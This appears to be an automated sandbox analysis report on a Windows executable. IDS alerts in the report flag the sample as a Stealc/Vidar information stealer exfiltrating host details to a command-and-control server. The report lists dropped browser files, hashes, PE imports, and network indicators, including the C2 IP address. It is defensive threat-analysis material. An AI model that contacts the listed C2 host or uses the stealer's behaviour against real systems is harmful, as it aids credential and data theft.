                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):912
                                                                                                                                                                                                                                                                              Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                              MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                              SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                              SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                              SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11406
                                                                                                                                                                                                                                                                              Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                              MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                              SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                              SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                              SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):854
                                                                                                                                                                                                                                                                              Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                              MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                              SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                              SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                              SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2525
                                                                                                                                                                                                                                                                              Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                              MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                              SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                              SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                              SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):97
                                                                                                                                                                                                                                                                              Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                              MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                              SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                              SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                              SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):122218
                                                                                                                                                                                                                                                                              Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                              MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                              SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                              SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                              SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):291
                                                                                                                                                                                                                                                                              Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                              MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                              SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                              SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                              SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):130866
                                                                                                                                                                                                                                                                              Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                              MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                              SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                              SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                              SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (816)
                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                              Size (bytes):821
                                                                                                                                                                                                                                                                              Entropy (8bit):5.174622399008442
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:9B/MDco6HBHslgT9lCuABATJfnuoB7HHHHHHHYqmffffffo:P/pHKlgZ01BAlvuSEqmffffffo
                                                                                                                                                                                                                                                                              MD5:B4184C0DECFEBB681640B9F430C28141
                                                                                                                                                                                                                                                                              SHA1:E8335FFC96527CCB2487451B8C2925DC7928CF00
                                                                                                                                                                                                                                                                              SHA-256:1A1E436924A0AB0FB931F8A4B0F6D7E0C256C5E6C4D74429B75422F555AFB604
                                                                                                                                                                                                                                                                              SHA-512:078E2C2F41D5BFD62857F9398B6F195B7CA51D63CD849FF8AC46B16650A19CC754CF68E7506083956CB857105DB7BB833F6D3B06DCB5EDD6EA39DBEC4D8E30DC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                              Preview:)]}'.["",["max kepler phillies","nvidia rtx 5090","tiktok banned","renegade raider in fortnite","denver nuggets portland trail blazers","librela for dogs","nyt strands hints december 19","weather forecast snow storm minnesota"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-6209228885730963161,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                                              Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                              MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                              SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                              SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                              SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                              Size (bytes):132739
                                                                                                                                                                                                                                                                              Entropy (8bit):5.4367649976402195
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:fikJQ7O4N5dTm+syHEt4W3XdQ4Q6yuSr/nUW2i6o:fLQ7HTt/sHdQ4Q6yDfUW8o
                                                                                                                                                                                                                                                                              MD5:C69D2F456BCA5EFB31778EFF0F44976B
                                                                                                                                                                                                                                                                              SHA1:48A178EBA80F105C405FFE966B44AFB2167BAB77
                                                                                                                                                                                                                                                                              SHA-256:AC761A5C3CB11E430512DDA73B8632BE68B02B7276680694E0C6342781F94121
                                                                                                                                                                                                                                                                              SHA-512:A35BA87EE748720075F9E3B2E2380971FCC5C5E59FC1F4C8EC9CEAE5C04263F560B1E057928B340CC9C4197371BF9C1CECAE510EF03088269020AA5CDD55ACB3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                              Size (bytes):5162
                                                                                                                                                                                                                                                                              Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                              MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                              SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                              SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                              SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                              Size (bytes):1660
                                                                                                                                                                                                                                                                              Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                              MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                              SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                              SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                              SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                              Entropy (8bit):6.454644633254379
                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                              File name:pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File size:147'968 bytes
                                                                                                                                                                                                                                                                              MD5:1d0fb45faa5b7a8b398703596d67c967
                                                                                                                                                                                                                                                                              SHA1:b326e3801b56b5ed86ae66249e6ea64cdefa1997
                                                                                                                                                                                                                                                                              SHA256:4e0453e61609c04bce1071d29f21abc82800e11261e284ca3250fd8655239456
                                                                                                                                                                                                                                                                              SHA512:9fa97e8611fd837f0756a505b8615076187d77fcf8aa5ff802944879e9d4d19ebccaea394b0c4327748c73da6bfca8acba6cdf12c5992056a798f28c064e0a63
                                                                                                                                                                                                                                                                              SSDEEP:3072:lOBRrLUOPed9xOi756fJnhsRSK2C22/m4ESZo3XRYzXIkQfydzdEpx:A/rLVPW0nsP2Xy+TJfUzW7
                                                                                                                                                                                                                                                                              TLSH:69E36C71A2C2A1B2CA4D33742A3E77FD9D709B222B04CDDBDBC4FC186E691D256B1416
                                                                                                                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ag.....................`....................@...........................#.............................................(......
                                                                                                                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                              Entrypoint:0x4185c0
                                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                              DLL Characteristics:NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                              Time Stamp:0x676198A3 [Tue Dec 17 15:28:35 2024 UTC]
                                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                                              Import Hash:8329c46c809815bc572f208fdd794284
                                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                                              je 00007F22BC6BC7D5h
                                                                                                                                                                                                                                                                              jne 00007F22BC6BC7D3h
                                                                                                                                                                                                                                                                              mov eax, 000046E8h
                                                                                                                                                                                                                                                                              add byte ptr [ebx+eax+75h], dh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x21728 | 0xc8 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x237000 | 0x149c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1fbd8 | 0x5c | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x21988 | 0x198 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1dd78 | 0x1de00 | 0ce5587661d15577632e53c8a6001885 | False | 0.5060800209205021 | data | 6.454457697482663 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x1f000 | 0x31cc | 0x3200 | 19c2454f62efc49584195239c34f4c4f | False | 0.491328125 | DOS executable (block device driver) | 5.681299886470633 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x23000 | 0x2121e0 | 0x1600 | bc81a9497a63b536266387a4e7cae584 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.00cfg | 0x236000 | 0x4 | 0x200 | 07ada419974a1f82db6bdd49d543272b | False | 0.03125 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x237000 | 0x149c | 0x1600 | 087859e7d46786662434790d6717c7ba | False | 0.7935014204545454 | data | 6.591187625006626 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | CloseHandle, CreateDirectoryA, CreateFileA, CreateThread, ExitProcess, ExpandEnvironmentStringsA, FileTimeToSystemTime, FindClose, FindFirstFileA, FindNextFileA, GetComputerNameA, GetCurrentProcess, GetDriveTypeA, GetFileInformationByHandle, GetFileSize, GetLastError, GetLocalTime, GetLogicalDriveStringsA, GetLogicalProcessorInformationEx, GetModuleHandleA, GetProcessHeap, GetTickCount, HeapAlloc, HeapFree, OpenProcess, RaiseException, ReadFile, ReadProcessMemory, SetFilePointer, Sleep, SystemTimeToFileTime, VirtualAlloc, VirtualAllocExNuma, VirtualFree, VirtualQueryEx, WaitForSingleObject, WriteFile, lstrcatA, lstrcmpiW, lstrcpyA, lstrlenA
msvcrt.dll | ??2@YAPAXI@Z, ??3@YAXPAX@Z, ??_U@YAPAXI@Z, ??_V@YAXPAX@Z, _itoa_s, _splitpath, atexit, free, isupper, malloc, memchr, memcmp, memcpy, memmove, memset, rand, srand, strchr, strcmp, strcpy, strcpy_s, strlen, strncpy, strstr, strtok_s
USER32.dll | CharToOemA, CloseDesktop, CreateDesktopA, GetDesktopWindow, OpenDesktopA, wsprintfA, wsprintfW
api-ms-win-crt-runtime-l1-1-0.dll | _invalid_parameter_noinfo_noreturn
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsnprintf_s
ADVAPI32.dll | GetCurrentHwProfileA, GetUserNameA, RegGetValueA, RegOpenKeyExA
SHELL32.dll | SHFileOperationA, SHGetFolderPathA
WS2_32.dll | WSACleanup, WSAStartup, closesocket, connect, freeaddrinfo, getaddrinfo, htons, recv, send, socket
SHLWAPI.dll | PathFileExistsA
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T07:31:12.064761+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.7 | 49701 | 116.203.12.114 | 443 | TCP
2024-12-20T07:31:14.357306+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.7 | 49703 | 116.203.12.114 | 443 | TCP
2024-12-20T07:31:16.665004+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 116.203.12.114 | 443 | 192.168.2.7 | 49709 | TCP
2024-12-20T07:31:18.966565+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 116.203.12.114 | 443 | 192.168.2.7 | 49715 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:07.231736898 CET49700443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:07.231744051 CET44349700116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:07.625591993 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:09.057523012 CET44349700116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:09.057590961 CET49700443192.168.2.7116.203.12.114
